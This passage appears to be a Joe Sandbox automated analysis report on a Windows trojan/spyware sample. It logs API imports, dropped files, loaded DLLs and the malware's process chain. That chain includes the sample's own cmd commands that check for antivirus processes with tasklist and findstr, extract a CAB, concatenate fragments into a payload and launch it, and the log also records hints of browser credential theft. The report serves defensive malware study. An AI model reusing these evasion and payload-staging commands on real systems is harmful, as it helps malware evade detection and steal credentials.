                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AF9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,14_2_00AF9FD2

                System Summary

                barindex
                Source: 0.2.TNyOrM6mIM.exe.850000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
                Source: TNyOrM6mIM.exeStatic PE information: section name:
                Source: TNyOrM6mIM.exeStatic PE information: section name: .idata
                Source: TNyOrM6mIM.exeStatic PE information: section name:
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AD4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,14_2_00AD4763
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AC1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,14_2_00AC1B4D
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,2_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ACF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,14_2_00ACF20D
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeFile created: C:\Windows\UtilitySoccerJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeFile created: C:\Windows\MoveRefurbishedJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeFile created: C:\Windows\ClarkWriterJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_0040737E2_2_0040737E
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406EFE2_2_00406EFE
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004079A22_2_004079A2
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004049A82_2_004049A8
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A8801714_2_00A88017
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A6E1F014_2_00A6E1F0
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A7E14414_2_00A7E144
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A822A214_2_00A822A2
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A622AD14_2_00A622AD
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A9A26E14_2_00A9A26E
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A7C62414_2_00A7C624
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AEC8A414_2_00AEC8A4
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A9E87F14_2_00A9E87F
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A96ADE14_2_00A96ADE
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AD2A0514_2_00AD2A05
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AC8BFF14_2_00AC8BFF
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A7CD7A14_2_00A7CD7A
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A8CE1014_2_00A8CE10
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A9715914_2_00A97159
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A6924014_2_00A69240
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AF531114_2_00AF5311
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A696E014_2_00A696E0
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A8170414_2_00A81704
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A81A7614_2_00A81A76
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A87B8B14_2_00A87B8B
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A69B6014_2_00A69B60
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A87DBA14_2_00A87DBA
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A81D2014_2_00A81D20
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A81FE714_2_00A81FE7
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\768400\Climb.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: String function: 00A7FD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: String function: 00A80DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: String function: 004062CF appears 57 times
                Source: TNyOrM6mIM.exe, 00000000.00000002.2382843415.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameladdad.exe4 vs TNyOrM6mIM.exe
                Source: TNyOrM6mIM.exe, 00000000.00000002.2385873971.0000000005780000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameladdad.exe4 vs TNyOrM6mIM.exe
                Source: TNyOrM6mIM.exeBinary or memory string: OriginalFilenameladdad.exe4 vs TNyOrM6mIM.exe
                Source: TNyOrM6mIM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.TNyOrM6mIM.exe.850000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: TNyOrM6mIM.exeStatic PE information: Section: fsurptkt ZLIB complexity 0.9944674079182821
                Source: Set-up.exe.0.drBinary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@28/22@10/3
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AD41FA GetLastError,FormatMessageW,14_2_00AD41FA
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AC2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,14_2_00AC2010
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AC1A0B AdjustTokenPrivileges,CloseHandle,14_2_00AC1A0B
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ACDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,14_2_00ACDD87
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004024FB CoCreateInstance,2_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AD3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,14_2_00AD3A0E
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeMutant created: NULL
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeFile created: C:\Users\user\AppData\Local\Temp\PasoCattle.exeJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Climb.com, 0000000E.00000003.2620355728.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: TNyOrM6mIM.exeReversingLabs: Detection: 65%
                Source: TNyOrM6mIM.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: TNyOrM6mIM.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
                Source: unknownProcess created: C:\Users\user\Desktop\TNyOrM6mIM.exe "C:\Users\user\Desktop\TNyOrM6mIM.exe"
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" Jump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ReflectJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled VJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com VJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: nlaapi.dllJump to behavior
